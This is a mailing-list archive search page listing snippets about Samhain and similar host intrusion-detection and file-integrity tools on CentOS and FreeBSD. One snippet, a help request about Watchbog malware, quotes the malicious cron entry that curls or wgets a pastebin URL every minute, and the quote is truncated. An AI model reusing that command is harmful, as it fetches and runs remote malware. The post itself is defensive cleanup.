search for: samhain

Displaying 17 results from an estimated 17 matches for "samhain".

2011 Jul 21
2
tripwire alternative
Hello all, Years ago, I used to work with tripwire for system monitoring. Last time I checked with "yum search tripwire", there is no hit. IIRC, it used to be packed by default on older Redhat distros. Any suggestion for an alternative of tripwire for my CentOS 5.6? Cheers, -- ********************************************************************** Viet Nhat General Joint Stock
2005 Jan 13
3
Aggregating logs from numerous FreeBSD machines
...ollects syslog messages from all my servers, indexes them by server and severity, and gives a reasonable management interface. Given expressions based on facility, severity, log message, and the like, it could throw away useless messages, or page me for critical ones. This would tie into AIDE/Samhain/Tripwire (haven't picked one yet) and maybe even different flavors of IDS. It could even warn me when processes run away with the CPU or RAM, or disks get too full. I've found a variety of things that almost do this. Nagios is good at paging for service failures, disk full warnings, a...
2017 Nov 06
1
How to detect botnet user on the server ?
Another alternative is to use a FIMS/HIDS such as Aide (Advanced Intrusion Detection Environment), OSSEC or Samhain. Be prepared to learn a lot about what your OS normally does behind the scenes (and thus a fair amount of initial fine tuning to exclude those things). Aide seems to work well (I've seen only one odd result) and is quite granular. However, it is local system based rather than centralized and...
2006 Jun 14
3
Tripwire for CentOS
Hi, I literally have about 36 machines running CentOS on a private network, and will probably change the remaining 30 or so away from Whitebox or RH in the near term. One thing I just noticed was when I tried to search out Tripwire RPM's, that none seemed evident. Can anyone point me in the direction of a Tripwire RPM that works with CentOS 4.3, or advise me on how to create one from the
2007 May 07
2
Host information gathering
...with puppet in an easy way. In the majority of cases, these commands change appropriate files, which reflect the current configuration. I'd like to get them stored in a central repository where they can be compared against an expected state. I'm using file integrity checkers (samhain and bart). These just tell that the checksum of a file changed, but know nothing about the content. I've thought about a 'config scan' which runs on the machine several times a day and transfers the gathered data to a central repository. Does anybody know a mechanis...
2017 Nov 06
2
How to detect botnet user on the server ?
Hello guys, What is the best way to identify a possible user using a botnet with php in the server? And if he is using GET commands for example in other server. Does apache log outbound connections? If it is using a file that is not malicious the clam av would not identify. Thanks
2005 Jun 16
3
turning off prelinking?
In short, the reason for considering (and still only considering) turning it off is to make tripwire usable again (security vs. performance, I guess). Is it possible to completely turn it off system-wide? Any additional steps needed on the existing system (that already has half of the binaries prelinked)? What order of performance degradation to expect? If it is minor, nobody is going to cry
2006 Feb 22
0
Some Hardware & Asterisk Applications Questions
...k for the first time. Planning to use PIII 550 Mhz with 256 or 512 MB Ram & 80 GB HDD. Please advise if the above configuration is ok for the application below...if not, please tell me what I need to have a comfortable system. I plan to install minimum CentOS 4.2 Server required with iptables, Samhain & Asterisk & associated programs. System will have no X/KDE/Gnome. I require an expandable system with at least two/three VoIP ports (have 256 Kbps Async Adsl) and two POTS ports (am not using FXO/FXS anology because I may confuse myself at this stage) that I will plug into the office Anal...
2019 Nov 14
0
how to know when a system is compromised
...ace down what ended up being a funny situation, Aide detected that /etc/hosts.deny would change timestamp but nothing else, turns out OSSEC has an active response feature to block attacks which involves updating that file to block a host for 10 minutes. You could also look into inotify options and Samhain is another HIDS (I'd love to hear about anyone's experience with it). A free variant of tripwire may still exist but is probably unsupported and Aide is a clone of it. I noticed that rootkit detection has also been mentioned in another reply. ________________________________ From: CentOS...
2018 Dec 15
7
CentOS 7.5 Linux box got infected with Watchbog malware
Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently I am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps and is done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget
2019 Nov 14
4
how to know when a system is compromised
How do you know when a Linux system has been compromised? Every day I watch our systems with all the typical tools, ps, top, who, I watch firewall / IPS logs, I have logwatch setup and mailing daily summaries to me and I dive deeper into logs if something looks suspicious. What am I missing or not looking at that you security gurus are looking at? I subscribe to the centos and SANS
2005 Jan 07
3
Intrusion Suspected, Advice Sought
I run OS X 10.3.7 on a PowerMac MDD G4 on a cable broadband connection. I have reason to think my system has been tampered with. Security features in Mac OS X have been left unlocked (Preference Pane - Users) even though a master lock has always been set in the Security Preference Pane. This locks all other important preference panes which could be tampered with. Also permissions have been
2012 May 25
4
PCI/DSS compliance on CentOS
I have a client project to implement PCI/DSS compliance. The PCI/DSS auditor has stipulated that the web server, application middleware (tomcat), the db server have to be on different systems. In addition the auditor has also stipulated that there be a NTP server, a "patch" server, The Host OS on all of the above nodes will be CentOS 6.2. Below is a list of things that would be
2009 Nov 28
6
AIDE or OSSEC on CentOS 5.4 x86_64?
Starting with a fresh load and after I finish hardening the load following the Center for Internet Security (CIS) guidance, I'm wondering whether AIDE or OSSEC would be a better intrusion detection system. I installed AIDE and did a quick test of AIDE and after initializing the db and applying the recent cups update, I found that 1700+ files had changed. Those are a lot of changes to wade
2005 Mar 03
4
Renaming root account
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi everyone, One quick question: Is it safe and/or sensible to rename the root account, so that the only uid 0 user on a system is something different to root? I can see how this would be effective against external attackers who have no knowledge of the internals of the system as they would spend pointless hours trying to crack a user which doesn't
2010 Apr 24
7
Pushing a file only if another does not exist.
I am trying to write a module for tripwire. I need to push out the twcfg.txt and twpol.txt files only if the tw.cfg and tw.pol files do not currently exist. How can I do this with File{}? I can't seem to find a way to do it. In general terms, how can you deploy file A only when file B does not exist? And... tripwire... what a mess. I am trying to push out the site key,
2013 Apr 18
0
Processed: adding new jessie tag to sid-tagged bugs
...: no attempt to resume when suspending to swapfile on dm-crypt device Added tag(s) jessie. > tags 240072 + jessie Bug #240072 {Done: Kurt Roeckx <kurt at roeckx.be>} [openssl] openssl: "engine dynamic -pre" segfaults Added tag(s) jessie. > tags 701353 + jessie Bug #701353 [src:samhain] samhain: ftbfs with GCC-4.8 Added tag(s) jessie. > tags 289084 + jessie Bug #289084 [ddclient] Debconf for ddclient does not ask for proxy Added tag(s) jessie. > tags 626718 + jessie Bug #626718 [src:xmail] xmail: FTBFS: missing -ldl Added tag(s) jessie. > tags 685015 + jessie Bug #685015...